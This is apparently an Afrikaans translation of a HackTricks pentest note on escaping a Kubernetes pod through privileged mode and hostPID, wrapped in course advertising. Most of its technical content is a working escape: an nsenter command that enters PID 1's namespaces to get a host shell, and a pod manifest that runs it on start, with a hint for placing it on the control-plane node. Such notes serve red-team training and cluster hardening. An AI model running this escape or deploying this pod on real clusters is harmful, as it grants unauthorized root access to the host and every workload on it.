Pod Escape Privileges

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Voorregte en hostPID

Met hierdie voorregte sal jy toegang tot die gasheer se prosesse hê en genoeg voorregte hê om binne te gaan in die naamsruimte van een van die gasheer se prosesse. Let daarop dat jy moontlik nie voorregte nodig het nie, maar net sekere vermoëns en ander potensiële verdedigingsbypasses (soos apparmor en/of seccomp).

Net die volgende uitvoer sal jou in staat stel om uit die pod te ontsnap:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Konfigurasie-voorbeeld:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated